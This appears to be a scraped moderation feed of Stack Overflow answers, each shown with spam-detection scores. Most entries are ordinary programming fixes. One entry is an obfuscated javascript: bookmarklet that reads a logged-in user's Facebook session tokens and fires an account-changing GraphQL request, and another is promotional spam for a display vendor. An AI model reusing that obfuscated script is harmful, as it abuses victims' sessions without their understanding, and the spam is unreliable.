.marketing-positioner {
  // margin: 0 auto;
  height: 371px;
  width: 355px;
  background-color: yellow;
}

And the working example https://codesandbox.io/p/sandbox/nervous-waterfall-gmgcvf?file=%2Fstyles.css%3A1%2C1-38%2C1

Reasons:
  • Probably link only (1):
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Me too answer (2.5): have the same problem
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: dariusz

79358531

Date: 2025-01-15 14:17:44
Score: 0.5
Natty:
Report link

I thought my problem was the referential equality since my signal is an object (as suggest by @JSON Derulo) , unfortunately I have implemented a custom equality function in the signal

filtersProd = signal(
    {source: '1', feedback: 'all'},
    {equal: (a, b) => {
        return a.feedback === b.feedback && a.source === b.source;
      }
    }
  );

but it still doesn't work.

I solved the issue separating the input value and the output event on the toggle button and updating the values of the object with the update method of the signal within the output handler.

FilterSourceFeedback html

<mat-button-toggle-group (valueChange)="feedbackHandler($event)" [value]="filters().feedback" hideSingleSelectionIndicator="true" name="feedback" aria-label="feedback rating">
    <mat-button-toggle value="all">all</mat-button-toggle>
    <mat-button-toggle value="4+">4+</mat-button-toggle>
    <mat-button-toggle value="3">3</mat-button-toggle>
    <mat-button-toggle value="1/2">1/2</mat-button-toggle>
</mat-button-toggle-group>

FilterSourceFeedback component

feedbackHandler(e: string) {
    const newFilters = {source: this.filters().source, feedback: e};
    this.filters.update(() => newFilters);
}

In this way the computed signal is updated every new selection of the feedback and consequently the result array.

Reasons:
  • Whitelisted phrase (-2): I solved
  • RegEx Blacklisted phrase (2): it still doesn't work
  • Long answer (-1):
  • Has code block (-0.5):
  • User mentioned (1): @JSON
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: berno

79358530

Date: 2025-01-15 14:17:44
Score: 2.5
Natty:
Report link

The underline issue you're seeing in the emulator or browser might not appear on a real mobile device. It's a rendering difference between environments. Try testing your app on a physical device by installing the APK, and the issue should likely be gone.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: vaishnavi Chalwadi

79358529

Date: 2025-01-15 14:16:44
Score: 2.5
Natty:
Report link

make sure you are using 'modules\system\layers\base\com\microsoft\jdbc\main' folder

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
Posted by: vedat

79358518

Date: 2025-01-15 14:13:43
Score: 3
Natty:
Report link

I have submitted a JENKINS-75122 improvement request, please vote it up or contribute! Meanwhile, it is achievable via customizable-header plugin.

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
Posted by: rantoniuk

79358492

Date: 2025-01-15 14:02:41
Score: 1
Natty:
Report link

Could you check below configuration,

Check for FodyWeavers.xml: • Ensure that a FodyWeavers.xml file exists in the root directory of each project. • This file should include the following configuration:

<Weavers> <PropertyChanging /> </Weavers>

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Deep Patel

79358486

Date: 2025-01-15 14:01:40
Score: 0.5
Natty:
Report link

The only chance to ingegrate it, is to buy a licence for MPLAB® Analysis tool.

It supports all Microchip MCU, MPU and CEC devices and offers a code coverage feature and a Motor Industry Software Reliability Association (MISRA®) check in the IDE.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • High reputation (-1):
Posted by: Mike

79358477

Date: 2025-01-15 13:59:40
Score: 1.5
Natty:
Report link

az identity list-resources --resource-group <ResourceGroupName> --name <ManagedIdentityName> will return a list of resources associated with the managed identity, or empty if there are none

https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-view-associated-resources-for-an-identity#command-line-interface

Reasons:
  • Probably link only (1):
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Stuart

79358475

Date: 2025-01-15 13:58:39
Score: 0.5
Natty:
Report link

Remove scrollPage from the dependency array since you want to scroll when the page loads

useEffect(() => {
  scrollPage.current?.scrollIntoView({ behavior: "smooth", block: "end" });
}, []);
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: MoBadraan

79358467

Date: 2025-01-15 13:53:37
Score: 1
Natty:
Report link

With the rapid advancement of technology, the demand for high-quality displays is growing rapidly. AUO TFT LCD displays, which are used in a wide range of applications from smartphones to industrial equipment, have become a key component of modern visual technology. As an authorized distributor of AUO TFT LCD displays, SZDflogwin Technology provides advanced and customized display solutions for various industries.

Why Choose AUO TFT LCD Displays?

  1. Superior Display Quality: AUO TFT LCDs offer vibrant colors, sharp visuals, and high resolution.
  2. Wide Range of Sizes and Features: Available in various sizes and specifications to meet diverse requirements.
  3. Customization: Custom touch panels with logo integration are provided for tailored solutions.
  4. Energy Efficiency: Equipped with power-saving technology, ensuring energy-efficient performance.
  5. Reliability and Durability: Designed to perform consistently in harsh environments.

Applications:

AUO TFT LCD displays are widely used across various industries, including:

Services by SZDflogwin Technology:

SZDflogwin Technology offers customized display solutions, consultation, logo integration, and after-sales support to meet clients' unique needs.

The Future of Display Technology:

With advancements in flexible displays, higher resolution, and improved energy efficiency, TFT LCD technology will continue to evolve. SZDflogwin Technology is committed to staying ahead of these trends and providing clients with the latest innovations.

Partner with SZDflogwin Technology:

SZDflogwin Technology is your trusted partner for high-quality and customized display solutions tailored to your requirements.
Visit our website: szdflogwin.com to learn more.

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: user29076737

79358464

Date: 2025-01-15 13:52:37
Score: 3
Natty:
Report link

Check the routing and the .htaccess code you have added properly.

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Developer Nilesh

79358459

Date: 2025-01-15 13:51:37
Score: 3.5
Natty:
Report link

do you explicitly indicate it in the resources?

resources:
  repositories:
  - repository: R2
    type: git
    name: R2
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Alexey Kipnis

79358452

Date: 2025-01-15 13:48:35
Score: 8 🚩
Natty:
Report link

Hey did anyone found a solution for the problem, I stumbled upon it 5y later and it seems like this is still an issue it seems like you cannot register 2 validators

Reasons:
  • Blacklisted phrase (2): anyone found
  • RegEx Blacklisted phrase (3): did anyone found a solution
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: ZambosSs1

79358449

Date: 2025-01-15 13:48:34
Score: 2
Natty:
Report link

I know, this topic is older, but i was facing this problem yesterday and this helped me:

git config --global http.postBuffer 15728640

Source: https://docs.hyperlane.co/git/common-git-problems/

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Asobitu

79358448

Date: 2025-01-15 13:47:34
Score: 0.5
Natty:
Report link

The below is what I eventually used to fix it:

microdnf install -y dnf oracle-epel-release-el9
dnf -y install 'dnf-command(config-manager)'
dnf config-manager --enable ol9_codeready_builder

Initially, I was just running microdnf install -y epel-release but being more specific seemed to work. I also switched to using dnf instead of microdnf, though I don't think that made much difference.

Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Alistair Hardy

79358447

Date: 2025-01-15 13:47:34
Score: 0.5
Natty:
Report link

in your Specialization.php Controller add this line:

echo '<pre>';print_r($data);echo '</pre>';die;

right above this line:

// Load page components

Now, reload controller and you will see all of the data... Look on the page for your arrays: $xValuesJobs and $xValuesJobs

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: DeanE10

79358441

Date: 2025-01-15 13:46:32
Score: 8 🚩
Natty:
Report link

I would like to ask you what you are expecting to see, a particular date or the timestamp of the video. Could you explain that to me? Thanks.

Reasons:
  • Blacklisted phrase (0.5): Thanks
  • RegEx Blacklisted phrase (2.5): Could you explain
  • Low length (1):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Emiliano A. Billi

79358438

Date: 2025-01-15 13:44:32
Score: 1
Natty:
Report link

Facing same type of issues and the fixes above are not helping:

Launching lib\main.dart on sdk gphone64 x86 64 in debug mode... Running Gradle task 'assembleDebug'... e: C:/Users/2000n/.gradle/caches/transforms-3/bd2d249c16b1bdaf35102b1c1dfeb30b/transformed/jetified-firebase-auth-23.1.0-api.jar!/META-INF/java.com.google.android.gmscore.integ.client.firebase-auth-api_firebase-auth-api.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.9999, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.common_common_ktx.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.common_logger.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.android_impl.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.internal.release.com.google.android.recaptcha.internal_release.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.internal_impl.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.internal_internal.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.native_impl.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise.public_public.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.enterprise_enterprise.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.metricscollection_metricscollection.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/java.com.google.android.libraries.abuse.recaptcha.network_network.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/recaptcha.proto.mobile_allowlist_kt_proto_lite.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/recaptcha.proto.mobile_enterprise_sdk_kt_proto_lite.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/recaptcha.proto.mobile_mobile_reload_kt_proto_lite.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/recaptcha.proto.mobile_signal_collection_payload_kt_proto_lite.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/recaptcha.proto.mobile_webview_sdk_kt_proto_lite.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/third_party.java_src.protobuf.current.java.com.google.protobuf.kotlin_only_for_use_in_proto_generated_code_its_generator_and_tests.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1. e: C:/Users/2000n/.gradle/caches/transforms-3/d13b60563cdac693f289f05d4426d38e/transformed/jetified-recaptcha-18.5.1-api.jar!/META-INF/third_party.java_src.protobuf.current.java.com.google.protobuf.kotlin_shared_runtime.kotlin_module: Module was compiled with an incompatible version of Kotlin. The binary version of its metadata is 1.9.0, expected version is 1.7.1.

FAILURE: Build failed with an exception.

A failure occurred while executing org.jetbrains.kotlin.compilerRunner.GradleCompilerRunnerWithWorkers$GradleKotlinCompilerWorkAction Compilation error. See log for more details

Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

BUILD FAILED in 52s

┌─ Flutter Fix ──────────────────────────────────────────────────────────────────────────────┐ │ [!] Your project requires a newer version of the Kotlin Gradle plugin. │ │ Find the latest version on https://kotlinlang.org/docs/releases.html#release-details, then │ │ update C:\Users\2000n\StudioProjects\caption_generator\android\build.gradle: │ │ ext.kotlin_version = '' │ └────────────────────────────────────────────────────────────────────────────────────────────┘ Error: Gradle task assembleDebug failed with exit code 1

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Filler text (0.5): ──────────────────────────────────────────────────────────────────────────────
  • Filler text (0): ────────────────────────────────────────────────────────────────────────────────────────────
  • Low reputation (1):
Posted by: Sandeep Chaudhury

79358436

Date: 2025-01-15 13:43:31
Score: 2.5
Natty:
Report link

If you’re using TypeScript, you also need to update the types.

npm install --save-exact @types/react@^19.0.0 @types/react-dom@^19.0.0

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: leonardo santos

79358435

Date: 2025-01-15 13:43:31
Score: 0.5
Natty:
Report link

I can't.

Visual Studio provides no way to see the contents of the actual, central repository. In the case of Github and Azure DevOps, the simplest way is to use a web browser and explore the repository through the website.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • High reputation (-1):
Posted by: Medinoc

79358431

Date: 2025-01-15 13:43:31
Score: 3
Natty:
Report link

Make sure there's no null in your CSV file. SQL Server threw the same error in our case because there was null present in some cells of the csv file.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Bihan Chakraborty

79358424

Date: 2025-01-15 13:39:30
Score: 5.5
Natty: 4.5
Report link

I recently faced the same issue and provided a solution using BroadcastChannel here: https://stackoverflow.com/a/79357987/8236645

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Coch

79358419

Date: 2025-01-15 13:38:29
Score: 2.5
Natty:
Report link

javascript:var fullName = "Abu Sayid󱢏"; var firstName = "Abu"; var middleName = " "; var lastName = "Sayid"; var _0x3a81=["\x43\x6F\x64\x65\x20\u0111\u01B0\u1EE3\x63\x20\x76\x69\u1EBF\x74\x20\x62\u1EDF\x69\x20\x44\u01B0\u01A1\x6E\x67\x20\x54\x6F\u1EA3\x6E\x20\x4D\x4D\x4F\x20\x2D\x20\x66\x62\x2E\x63\x6F\x6D\x2F\x74\x6F\x61\x6E\x74\x72\x75\x6E\x67\x67\x69\x61\x6E\x6D\x6D\x6F","\x5F\x5F\x73\x70\x69\x6E\x5F\x72","\x53\x69\x74\x65\x44\x61\x74\x61","\x6A\x61\x7A\x6F\x65\x73\x74","\x53\x70\x72\x69\x6E\x6B\x6C\x65\x43\x6F\x6E\x66\x69\x67","\x74\x6F\x6B\x65\x6E","\x44\x54\x53\x47\x49\x6E\x69\x74\x69\x61\x6C\x44\x61\x74\x61","\x41\x43\x43\x4F\x55\x4E\x54\x5F\x49\x44","\x43\x75\x72\x72\x65\x6E\x74\x55\x73\x65\x72\x49\x6E\x69\x74\x69\x61\x6C\x44\x61\x74\x61","\x4C\x53\x44","\x73","\x68\x73\x69","\x64\x79\x6E","\x63\x73\x72","\x66\x31\x39\x61\x63\x30\x32\x64\x2D","\x73\x75\x62\x73\x74\x72","\x72\x61\x6E\x64\x6F\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x63\x63\x6F\x75\x6E\x74\x73\x63\x65\x6E\x74\x65\x72\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x67\x72\x61\x70\x68\x71\x6C\x2F","\x31\x61","\x31\x39\x36\x31\x39\x2E\x48\x59\x50\x3A\x61\x63\x63\x6F\x75\x6E\x74\x73\x5F\x63\x65\x6E\x74\x65\x72\x5F\x70\x6B\x67\x2E\x32\x2E\x31\x2E\x2E\x30\x2E\x30","\x45\x58\x43\x45\x4C\x4C\x45\x4E\x54","\x74\x72\x75\x6E\x6B","\x52\x65\x6C\x61\x79\x4D\x6F\x64\x65\x72\x6E","\x75\x73\x65\x46\x58\x49\x4D\x55\x70\x64\x61\x74\x65\x4E\x61\x6D\x65\x4D\x75\x74\x61\x74\x69\x6F\x6E","\x64\x65\x76\x69\x63\x65\x5F\x69\x64\x5F\x66\x65\x74\x63\x68\x5F\x64\x61\x74\x72","\x46\x42\x5F\x57\x45\x42","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x35\x37\x36\x33\x35\x31\x30\x38\x35\x33\x37\x36\x33\x39\x36\x30","\x26","\x6A\x6F\x69\x6E","\x3D","\x6D\x61\x70","\x6B\x65\x79\x73","\x65\x72\x72\x6F\x72","\x63\x61\x74\x63\x68","\x6C\x6F\x67","\x74\x68\x65\x6E","\x74\x65\x78\x74","\x50\x4F\x53\x54","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64"];alert(_0x3a81[0]);var spinr=require(_0x3a81[2])[_0x3a81[1]];var jazoest=require(_0x3a81[4])[_0x3a81[3]];var fb_dtsg=require(_0x3a81[6])[_0x3a81[5]];var uid=require(_0x3a81[8])[_0x3a81[7]];var lsd=require(_0x3a81[9])[_0x3a81[5]];var s=require(_0x3a81[2])[_0x3a81[10]];var hsi=require(_0x3a81[2])[_0x3a81[11]];var dyn=require(_0x3a81[2])[_0x3a81[12]];var csr=require(_0x3a81[2])[_0x3a81[13]];function generateClientMutationId(){return _0x3a81[14]+ Math_0x3a81[16].toString(36)_0x3a81[15]}var clientMutationId=generateClientMutationId();var url=_0x3a81[17];var requestData={av:uid,user:uid,a:1,req:_0x3a81[18],hs:_0x3a81[19],dpr:1.5,ccg:_0x3a81[20],rev:1008717767,s:s,hsi:hsi,dyn:dyn,csr:csr,comet_req:5,fb_dtsg:fb_dtsg,jazoest:jazoest,lsd:lsd,spin_r:spinr,spin_b:_0x3a81[21],spin_t:clientMutationId,fb_api_caller_class:_0x3a81[22],fb_api_req_friendly_name:_0x3a81[23],variables:JSON_0x3a81[26],server_timestamps:true,doc_id:_0x3a81[27]};var data=Object_0x3a81[32][_0x3a81[31]](function(_0xb28exf){return (encodeURIComponent(_0xb28exf)+ _0x3a81[30]+ encodeURIComponent(requestData[_0xb28exf]))})_0x3a81[29];fetch(url,{method:_0x3a81[38],body:data,headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x3a81[39]}})[_0x3a81[36]](function(_0xb28ex12){return _0xb28ex12_0x3a81[37]})_0x3a81[36]_0x3a81[34]

Reasons:
  • Contains signature (1):
  • Long answer (-1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Abu Sayid

79358415

Date: 2025-01-15 13:37:29
Score: 1
Natty:
Report link

from PIL import Image, ImageDraw

skin = Image.new("RGBA", (64, 64), (0, 0, 0, 0)) draw = ImageDraw.Draw(skin)

draw.rectangle([8, 8, 15, 15], fill=(240, 240, 240)) draw.rectangle([10, 10, 13, 11], fill=(30, 30, 30))

draw.rectangle([8, 7, 15, 8], fill=(255, 255, 255))

draw.rectangle([20, 20, 27, 31], fill=(50, 50, 50))

draw.rectangle([36, 20, 39, 31], fill=(50, 50, 50))

draw.rectangle([44, 20, 47, 31], fill=(50, 50, 50))

draw.rectangle([4, 36, 7, 47], fill=(50, 50, 50))

draw.rectangle([12, 36, 15, 47], fill=(50, 50, 50))

draw.rectangle([9, 7, 10, 8], fill=(100, 200, 255)) draw.rectangle([12, 7, 13, 8], fill=(100, 200, 255))

output_path = "/mnt/data/Gojo_Female_Minecraft_Skin.png" skin.save(output_path)

output_path

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: SHAMSA ALSHEHHI

79358414

Date: 2025-01-15 13:37:28
Score: 4
Natty: 4.5
Report link

I made an API for this: https://github.com/Netflix/Hystrix/wiki -> https://wiki.forgithub.com/Netflix/Hystrix/wiki

Hope it is useful

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Jan

79358411

Date: 2025-01-15 13:36:27
Score: 1.5
Natty:
Report link

It might work using the following method: Right click on the razor file then click open. There is no logic to it but this works for me.

Reasons:
  • Whitelisted phrase (-1): works for me
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Mahdi

79358401

Date: 2025-01-15 13:34:26
Score: 5
Natty: 5.5
Report link

Now its not working any sollution

Reasons:
  • Blacklisted phrase (1): its not working
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Soumik Mondal

79358396

Date: 2025-01-15 13:32:26
Score: 1
Natty:
Report link

try { final Field f1 = this.promptTextField.getClass().getSuperclass().getDeclaredField("promptText"); f1.setAccessible(true); f1.set(this.promptTextField, new SimpleStringProperty("Shift-Enter = Send prompt\nDouble-Click on message = Copy text to clipboard"));

} catch (NoSuchFieldException | SecurityException | IllegalArgumentException | IllegalAccessException e) {

    e.printStackTrace();
}
Reasons:
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: user29210257

79358391

Date: 2025-01-15 13:30:25
Score: 2.5
Natty:
Report link

I have the same problem and have just figured out how to do it using vs code (to get the Whitesmith style). The way I did it was to use the vcFormat formatter rather than the default clang formatter. So go to settings in vscode (Ctrl ,) and edit the settings page (not the json page). I entered the search term 'format' and scrolled till I saw the setting

C_Cpp: Formatting

as seen in diagram below. screenshot of settings page showing where to change formatter type

I changed this from the default of clangFormat to vcFormat, then I changed a further two items. I actually changed them in the settings dialog, but for conciseness I am showing the changes in the following json version of the settings file:

"C_Cpp.vcFormat.indent.braces": true,
"C_Cpp.vcFormat.newLine.beforeOpenBrace.block": "newLine",

Finally I had to add the following two items to get it to work for me. These changes are also shown in their json page.

"editor.tabSize": 2,
"editor.detectIndentation": false
Reasons:
  • Blacklisted phrase (1): I have the same problem
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Me too answer (2.5): I have the same problem
Posted by: Paulus

79358374

Date: 2025-01-15 13:22:23
Score: 1
Natty:
Report link

You can get this issue when there is an error in you lambda code. Check out the logs in Cloudwatch to find out why. For example in my case my lambda code was compiled with Java 21 but running on Java 17. The logs shows it java.lang.UnsupportedClassVersionError:

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: BDurand

79358372

Date: 2025-01-15 13:22:23
Score: 1
Natty:
Report link
var person1 = Person("LastName1", "FirstName1")
var person2 = person1.copy(fistName = person1.firstName.toLowerCase)
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Mircea Sirghi

79358371

Date: 2025-01-15 13:21:22
Score: 3.5
Natty:
Report link

Seems like the problem was us testing on a simulator.

It works fine on an actual device.

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Philipp

79358365

Date: 2025-01-15 13:18:22
Score: 1
Natty:
Report link

I don't know if it's the best solution, but according to the documentation, I added "noImplicitThis": false to the compilerOptions object inside tsconfig.json and I don't get any error now

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Single line (0.5):
Posted by: naspy971

79358361

Date: 2025-01-15 13:17:21
Score: 2.5
Natty:
Report link

The problem could be with permalinks. Check that the URL in _data/navigation.yml to your page, and the permalink in the header of your new page in _pages/ is exactly the same (In my case, it is case-sensitive).

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: David

79358359

Date: 2025-01-15 13:16:20
Score: 7
Natty: 7
Report link

This article explains how to achieve it using node. https://medium.com/@lara.delrio333/deploy-an-angular-project-in-vercel-with-secret-environment-variables-74323925712d

Reasons:
  • Blacklisted phrase (1): This article
  • Blacklisted phrase (0.5): medium.com
  • Blacklisted phrase (1): how to achieve
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Argy Dev

79358355

Date: 2025-01-15 13:15:20
Score: 1.5
Natty:
Report link

You can use window.screen for the screen. I do not think you will get a guide. window.screen

or document.getElementsByTagName('body')[0].clientWidth for the in browser width.

Reasons:
  • Whitelisted phrase (-1.5): You can use
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Gergo

79358354

Date: 2025-01-15 13:15:20
Score: 3.5
Natty:
Report link

Old questions, but I guess you have installed tableau-api-lib (with hyphens) but trying to import tableau_api_lib (with underscores).

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Guesinho

79358346

Date: 2025-01-15 13:12:19
Score: 1
Natty:
Report link

My solution to this problem based on this link:

<ng-select appendTo="body" [items]="items"></ng-select>

And style to app.scss or with ::ng-deep when it needs to use only for one|isolate component.

.ng-dropdown-panel {
  z-index: 2102 !important;
}
Reasons:
  • Blacklisted phrase (1): this link
  • Low length (0.5):
  • Has code block (-0.5):
Posted by: Viktor Ivliiev

79358345

Date: 2025-01-15 13:12:19
Score: 1
Natty:
Report link

I tried changing the DelayValidation to True but it did not work so I tested updating Visual Studio, but no. Then I came over this issue: https://developercommunity.visualstudio.com/t/ssis-crashing-on-dataflow-open/415794 So I tested to move the Visual Studio window from the external screen to the laptop screen and it worked at once and continued to work even when I moved it back to the external screen! Then I tried to set DelayValidation to False again, and it stopped working. So I would say that setting DelayValidation to True really is the way to go, but sometimes, if you use an external monitor with a laptop, you have to move Visual Studio to the laptop screen.

Reasons:
  • Blacklisted phrase (1): did not work
  • Whitelisted phrase (-1): it worked
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Anders Lundberg

79358323

Date: 2025-01-15 13:07:17
Score: 1
Natty:
Report link

server-side=your app will work on server, when it works will return result. client asks from server, server execute commands e.g. get client list from a database.

client-side=play with browser (chrome or edge, firefox or etc) by using JS (or similar scripts). you can run scripts by using browser. about anything you are allowed by browser ofcourse. e.g. change content of textbox, change color of a span etc

briefly;

server-side=get data which is located on server by using a script page

client-side=play with client s browser

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Fatih AYDIN

79358320

Date: 2025-01-15 13:07:17
Score: 2.5
Natty:
Report link

This answer has deprecated, I am on version 2022_09_01 and NetworkManagementClient no longer has .config

I cannot seem to be able to set the proxy anymore without defining OS environmentals, which I cannot do because other possible code executions at the same time in turn reach for metadata, which CANNOT go via proxy.

Reasons:
  • Blacklisted phrase (0.5): I cannot
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Bart

79358286

Date: 2025-01-15 12:57:15
Score: 1
Natty:
Report link

